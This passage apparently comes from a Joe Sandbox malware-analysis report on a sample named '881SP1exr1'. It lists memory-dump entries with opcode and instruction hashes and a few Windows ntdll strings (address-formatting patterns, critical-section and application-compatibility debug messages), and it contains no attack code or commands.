                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a336cedc89248f40f0df084003d525709b3100057d861b5c3c4d704e65d4685f
                                                                                                                • Instruction ID: eda95f3002c24bfe244f2c1606ea60684529eabaa202d4ca155573550ad883dc
                                                                                                                • Opcode Fuzzy Hash: a336cedc89248f40f0df084003d525709b3100057d861b5c3c4d704e65d4685f
                                                                                                                • Instruction Fuzzy Hash: 969002B16059011291407158488454A4109A7F0305B55C012E4424555CCB248A565362
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 481395993c2e683e0fd8a745887be2304bb7003fbe80716abc74d56a82f0fb5c
                                                                                                                • Instruction ID: 6acd651a126d61897ce2e91fffa4f4a88727d650b7504a553e4c48cd1804e433
                                                                                                                • Opcode Fuzzy Hash: 481395993c2e683e0fd8a745887be2304bb7003fbe80716abc74d56a82f0fb5c
                                                                                                                • Instruction Fuzzy Hash: 0E9002E16016014241407158480440A6109A7F1305395C116A4554561CC7288955936A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b62e80f4b706b60cec51707ce975070f5f1b215d0d14ee45517a2911b17c0c64
                                                                                                                • Instruction ID: 5145ea7d864487143c28daa972a728610ef8aef2d1e3547852eb026aa11d820d
                                                                                                                • Opcode Fuzzy Hash: b62e80f4b706b60cec51707ce975070f5f1b215d0d14ee45517a2911b17c0c64
                                                                                                                • Instruction Fuzzy Hash: 7D9002B120554942D14071584404A4A011997E0309F55C012A4064695DD7358E55B762
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d785d064ea1cc0052a219bf42472aca95a4f8e16b80b42d2ee43a7604f39deab
                                                                                                                • Instruction ID: dbba9c14c685d0d0fcfda3642ae03997c64ae4b72a319d5c204065205aed9f27
                                                                                                                • Opcode Fuzzy Hash: d785d064ea1cc0052a219bf42472aca95a4f8e16b80b42d2ee43a7604f39deab
                                                                                                                • Instruction Fuzzy Hash: 699002B120150902D1047158480468A010997E0305F55C012AA024656ED77589917232
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7a38d2aa34135427c35928d92784cf2a8dfd849e49f8dd27599ccee284da7cf6
                                                                                                                • Instruction ID: e5159a253d6422969fbb1b0e3d02921642d78785e2cb8e10dddfe9e3e9646a49
                                                                                                                • Opcode Fuzzy Hash: 7a38d2aa34135427c35928d92784cf2a8dfd849e49f8dd27599ccee284da7cf6
                                                                                                                • Instruction Fuzzy Hash: 499002B160550902D1507158441474A010997E0305F55C012A4024655DC7658B5577A2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b802dff6ae9c6b5182d85a2c8628f8306a1f41309b49a80fff5c529a748e3abc
                                                                                                                • Instruction ID: 57db85265565b203969f14bc732b8502cf146bfab518418039196ebef3b932a1
                                                                                                                • Opcode Fuzzy Hash: b802dff6ae9c6b5182d85a2c8628f8306a1f41309b49a80fff5c529a748e3abc
                                                                                                                • Instruction Fuzzy Hash: 2C9002A5221501020145B558060450F0549A7E6355395C016F5416591CC73189655322
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 03b780b01c9a503075b106ee08b3a623dd47e2d022c44ed89ac9f34a2ae646a0
                                                                                                                • Instruction ID: e791d9b7d53e5805c0e07ac8a7537565f3be8876a382aeafa99f7983f5eb2668
                                                                                                                • Opcode Fuzzy Hash: 03b780b01c9a503075b106ee08b3a623dd47e2d022c44ed89ac9f34a2ae646a0
                                                                                                                • Instruction Fuzzy Hash: 779002E1201641924500B2588404B0E460997F0205B55C017E5054561CC63589519236
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 351d748627a73f069773c2f9ac1ed5a4f2747874304cac4282a16617eaa6b543
                                                                                                                • Instruction ID: 535b145e59159ab7f785f81a17dceda42061c45245b434e10f24144669051d11
                                                                                                                • Opcode Fuzzy Hash: 351d748627a73f069773c2f9ac1ed5a4f2747874304cac4282a16617eaa6b543
                                                                                                                • Instruction Fuzzy Hash: 5A9002A120554542D10075585408A0A010997E0209F55D012A5064596DC7358951A232
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 73b55182da3e42c7c0cc4768c427fd77788c6449fd94613ec72d9cb187795d9a
                                                                                                                • Instruction ID: 977e0a79467e1a79dc5aa5041b87db38c58ba0d7937ac4c6dad4693991ff2e3f
                                                                                                                • Opcode Fuzzy Hash: 73b55182da3e42c7c0cc4768c427fd77788c6449fd94613ec72d9cb187795d9a
                                                                                                                • Instruction Fuzzy Hash: D09002B124150502D1417158440460A010DA7E0245F95C013A4424555EC7658B56AB62
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4979a4a42ae64b58da48e81adca404de00fccd13e11a9245836bb1591cdacfc9
                                                                                                                • Instruction ID: cba54510201a4781e31ba6b06514511e7d1b1d896ff47cc5f12aad2edbcc05ea
                                                                                                                • Opcode Fuzzy Hash: 4979a4a42ae64b58da48e81adca404de00fccd13e11a9245836bb1591cdacfc9
                                                                                                                • Instruction Fuzzy Hash: B09002B120150942D10071584404B4A010997F0305F55C017A4124655DC725C9517622
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e6f7886be31dcc33ad86562b454bf312e415d0a6fa3836e2035fe6b92f50d18b
                                                                                                                • Instruction ID: 7da9be18e353d15a0f1569afc1000c762a976c4a03956c8536c37eefe8b19972
                                                                                                                • Opcode Fuzzy Hash: e6f7886be31dcc33ad86562b454bf312e415d0a6fa3836e2035fe6b92f50d18b
                                                                                                                • Instruction Fuzzy Hash: E39002A160550502D1407158541870A011997E0205F55D012A4024555DC7698B5567A2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ff938547d57cf9d2845e724aa5971ff0b25824e626b75828507eaf5323abc0a6
                                                                                                                • Instruction ID: e4cfd4c9243ba0dacd39db83cd5180f6f3cb0b9b8344ef094ed5880fcb347883
                                                                                                                • Opcode Fuzzy Hash: ff938547d57cf9d2845e724aa5971ff0b25824e626b75828507eaf5323abc0a6
                                                                                                                • Instruction Fuzzy Hash: 249002B120150503D1007158550870B010997E0205F55D412A4424559DD76689516222
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 059063d7737fa54d291e700f798b24164a5488cb09107604d9b2d76a57c41806
                                                                                                                • Instruction ID: 90ce1c5b4998862b09a8d6dcc8af7e7632c6a660ff88c213ae89060eab408c66
                                                                                                                • Opcode Fuzzy Hash: 059063d7737fa54d291e700f798b24164a5488cb09107604d9b2d76a57c41806
                                                                                                                • Instruction Fuzzy Hash: AB9002E121150142D1047158440470A014997F1205F55C013A6154555CC6398D615226
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: db8c6016d70946a43cb009666f9c72c2643d81e0266efe60b4df105bef88d0ff
                                                                                                                • Instruction ID: bfe32f4382fe577be9a5b17f575f8800d10bf4b307bb6cb617480f6d61d0cbbf
                                                                                                                • Opcode Fuzzy Hash: db8c6016d70946a43cb009666f9c72c2643d81e0266efe60b4df105bef88d0ff
                                                                                                                • Instruction Fuzzy Hash: A99002B120190502D1007158480874B010997E0306F55C012A9164556EC775C9916632
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3be77bd3b3a71ebe2813a2406dadcc5057da1c527495f52f74d7d8dfeeee4c5f
                                                                                                                • Instruction ID: 064df9f1db24e828cf7bd3b572c6c1d3746d95c1c52fa33ada5e8f7632a6463e
                                                                                                                • Opcode Fuzzy Hash: 3be77bd3b3a71ebe2813a2406dadcc5057da1c527495f52f74d7d8dfeeee4c5f
                                                                                                                • Instruction Fuzzy Hash: AB9002A130150502D1027158441460A010DD7E1349F95C013E5424556DC7358A53A233
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8c7875478f6ac2106f1b14b3d455752c6cb96ace57d367fcb039a7d89129b493
                                                                                                                • Instruction ID: 03ead0630476b3e89cb8b5dd6d64f60ca1676197fb52fa81cc968c5ee9e40248
                                                                                                                • Opcode Fuzzy Hash: 8c7875478f6ac2106f1b14b3d455752c6cb96ace57d367fcb039a7d89129b493
                                                                                                                • Instruction Fuzzy Hash: 999002E120190503D1407558480460B010997E0306F55C012A6064556ECB398D516236
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: da7859f9ff911846c1f617b5bf5ec9db94229862f2271a74e03824918e55c463
                                                                                                                • Instruction ID: f0d1394a56c526bf98334d95ab72c5d25fe1cd34d3459dd3483fd0e56b554f06
                                                                                                                • Opcode Fuzzy Hash: da7859f9ff911846c1f617b5bf5ec9db94229862f2271a74e03824918e55c463
                                                                                                                • Instruction Fuzzy Hash: 619002A120194542D14072584804B0F420997F1206F95C01AA8156555CCA2589555722
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 37e6c9fb340967c3db293ce2512d62c7455548b66ca1f830e50ab3b907fc75d8
                                                                                                                • Instruction ID: 5bb388a7d2cb321052fd5d69bd3610126121557108c23642d36f6164e2c02bac
                                                                                                                • Opcode Fuzzy Hash: 37e6c9fb340967c3db293ce2512d62c7455548b66ca1f830e50ab3b907fc75d8
                                                                                                                • Instruction Fuzzy Hash: 509002A124150902D1407158841470B010AD7E0605F55C012A4024555DC7268A6567B2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: fa04dfdf537a1659b0faae2f2893374d2cf7f4ba56f42dd85fba72dbeb256b46
                                                                                                                • Instruction ID: 0942d6edea510284d8d7094049b8d213bb93496acc2206cf86893c59d787cb90
                                                                                                                • Opcode Fuzzy Hash: fa04dfdf537a1659b0faae2f2893374d2cf7f4ba56f42dd85fba72dbeb256b46
                                                                                                                • Instruction Fuzzy Hash: 979002B160560502D1007158451470A110997E0205F65C412A4424569DC7A58A5166A3
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c23232f7ba703ca34bcd622bb389efecdd26c5c544e18aff1533aa6a71942577
                                                                                                                • Instruction ID: 195fedb14019c50e2997a568fcf466866ed87436b324590a77cfea20a6de6402
                                                                                                                • Opcode Fuzzy Hash: c23232f7ba703ca34bcd622bb389efecdd26c5c544e18aff1533aa6a71942577
                                                                                                                • Instruction Fuzzy Hash: 129002A124555202D150715C440461A4109B7F0205F55C022A4814595DC66589556322
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6159a4ac4f11ebc165e85a6929c868a72d678534770e82e910047cbc8d053c24
                                                                                                                • Instruction ID: 5650f5e52a070ec782e272cde586239361eaa4968185720ee51888c4670feef6
                                                                                                                • Opcode Fuzzy Hash: 6159a4ac4f11ebc165e85a6929c868a72d678534770e82e910047cbc8d053c24
                                                                                                                • Instruction Fuzzy Hash: DE9002B520150502D5107158580464A014A97E0305F55D412A4424559DC76489A1A222
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d03e634e12686cfc1576619ae4b966c3a6c85b6ff26886a57b0cb1b9112f6596
                                                                                                                • Instruction ID: 83862b172482796285d3a0cd6e7d3adb4187a5ee30ff3778e737b266ff1dee9a
                                                                                                                • Opcode Fuzzy Hash: d03e634e12686cfc1576619ae4b966c3a6c85b6ff26886a57b0cb1b9112f6596
                                                                                                                • Instruction Fuzzy Hash: 129002B120250242954072585804A4E420997F1306B95D416A4015555CCA2489615322
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                • Instruction ID: edd72e14b954ea6981e0968d8ad4e7ad4bfb3d7dc2907726650e9a559adf4eea
                                                                                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ___swprintf_l
                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                • Opcode ID: 0aa8ece54bceae78b9bef48d26a1aa69e066645d8593dae2f5258cae25f02660
                                                                                                                • Instruction ID: 5b8e4ae5fc4f2d5e7c0b785f7fd161069bfccb5786d79225ab637780973052c5
                                                                                                                • Opcode Fuzzy Hash: 0aa8ece54bceae78b9bef48d26a1aa69e066645d8593dae2f5258cae25f02660
                                                                                                                • Instruction Fuzzy Hash: A351F6B6A00116BFCB51DF9D888097FFBB8BB08244714822BE865D7752D3B4DE4087A0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ___swprintf_l
                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                • Opcode ID: 4540c7028ee879827932c2c348356f68d6264b071470409a84bf7a7abe25571a
                                                                                                                • Instruction ID: 3c4e512e10f1405174f334e23d8f252a6c06e8fe4caff73085122471444e9cef
                                                                                                                • Opcode Fuzzy Hash: 4540c7028ee879827932c2c348356f68d6264b071470409a84bf7a7abe25571a
                                                                                                                • Instruction Fuzzy Hash: E4510479A00645AFCB61DE5DC990C7FFBF8AB54604B04846FE496D3691E6F4DA008760
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 014846FC
                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 01484787
                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01484742
                                                                                                                • ExecuteOptions, xrefs: 014846A0
                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01484725
                                                                                                                • Execute=1, xrefs: 01484713
                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01484655
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                • API String ID: 0-484625025
                                                                                                                • Opcode ID: 60680651559314cb69712c55cb6f7f96f2658f382439f7aac3b3fcb12f02e6f9
                                                                                                                • Instruction ID: 1395c69ce9e9ef574d59f8ab2e4d35db712f074fad7e09e11dbdf1068bf3ded6
                                                                                                                • Opcode Fuzzy Hash: 60680651559314cb69712c55cb6f7f96f2658f382439f7aac3b3fcb12f02e6f9
                                                                                                                • Instruction Fuzzy Hash: B9512F3160021AABFF11EB99DC45FBE7BB9EF24315F04009FD609A72A1D7719A468F50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                • Instruction ID: ea97940b3293b1c126416d8e9722e4ab2ab529ede6767b331d5f74a781ee40de
                                                                                                                • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                • Instruction Fuzzy Hash: B2023670508342AFD705CF19C498A6FBBE5EFE8711F41892EF9894B265DB31E905CB82
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __aulldvrm
                                                                                                                • String ID: +$-$0$0
                                                                                                                • API String ID: 1302938615-699404926
                                                                                                                • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                • Instruction ID: 0154d6d731da617b66861c25cc1a1dde4d17027a2e4274b541c017ad54fef975
                                                                                                                • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                • Instruction Fuzzy Hash: 89819F70E052499EEF658E6CC8917BEBBA3EF45320F18415BDC65A73A3C7349841CB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ___swprintf_l
                                                                                                                • String ID: %%%u$[$]:%u
                                                                                                                • API String ID: 48624451-2819853543
                                                                                                                • Opcode ID: 09f9a7000ba29bd736ed0d731a6d8883135c31045f4ffa53a1cb2fd7cef8b0f9
                                                                                                                • Instruction ID: 89225731e0003ef8230b01d0e6975ab34bfb43fc61984bcaf6561f894f77349d
                                                                                                                • Opcode Fuzzy Hash: 09f9a7000ba29bd736ed0d731a6d8883135c31045f4ffa53a1cb2fd7cef8b0f9
                                                                                                                • Instruction Fuzzy Hash: A721537AA00119ABDB51DF6AD840EFF7BF8EF94A44F04012BE905D3255EBB0D9018BA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Strings
                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 014802BD
                                                                                                                • RTL: Re-Waiting, xrefs: 0148031E
                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 014802E7
                                                                                                                Memory Dump Source
